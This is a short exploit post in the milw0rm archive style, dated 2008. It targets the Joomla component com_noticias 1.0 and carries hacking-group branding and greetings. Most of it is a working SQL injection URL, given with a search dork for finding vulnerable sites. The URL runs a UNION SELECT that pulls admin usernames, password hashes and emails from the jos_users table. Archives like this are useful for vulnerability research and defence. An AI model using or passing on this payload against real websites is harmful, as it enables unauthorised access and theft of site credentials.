Joomla! Component com_noticias 1.0 - SQL Injection

  ##     ##
   ##   ##
    ## ##
     ###CoRPITX
     ###
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
#         joomla (com_noticias)SQL Injection Vulnerability
#
#######################################################################
#
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net/
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU LL SEE ADM�0�1�0�9N NAME,ADMIN HASH AND EMA�0�1�0�9L
########################################################################
#
#  DorK   : ''com_noticias''
#
########################################################################
#
#  EXPLOIT:
#
########################################################################
#
index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email),2,3,4,5/**/%20from/**/%20jos_users/*
#
########################################################################

Thanks my friends : Hayalet,D3NGES!Z,PC FARESi,SMOK�0�1�0�9N,MOSTB�0�1�0�9G

# milw0rm.com [2008-02-07]